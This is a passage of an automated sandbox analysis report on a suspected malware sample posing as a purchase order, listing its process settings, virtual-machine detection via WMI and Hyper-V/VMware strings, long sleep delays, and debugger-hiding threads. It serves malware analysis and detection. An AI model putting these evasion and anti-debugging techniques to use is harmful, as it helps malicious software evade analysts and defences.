                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5127
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2128
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4329
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2904
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow / User API: threadDelayed 3085
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWindow / User API: threadDelayed 6729
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1332Thread sleep time: -9223372036854770s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 4329 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2308Thread sleep count: 2904 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4228Thread sleep count: 52 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1320Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6112Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220Thread sleep count: 3085 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exe TID: 6220Thread sleep count: 6729 > 30
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread delayed: delay time: 922337203685477
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmpBinary or memory string: Hyper-V
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWy
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303094525.00000000067AA000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: AdvancedRun.exe, 00000023.00000002.431211915.000000000083B000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000002.297172998.0000000004950000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: powershell.exe, 00000008.00000003.356624082.0000000004DBB000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.423263716.00000000054B4000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggersShow sources
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\Desktop\08042021New-PurchaseOrder.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exeThread information set: HideFromDebugger
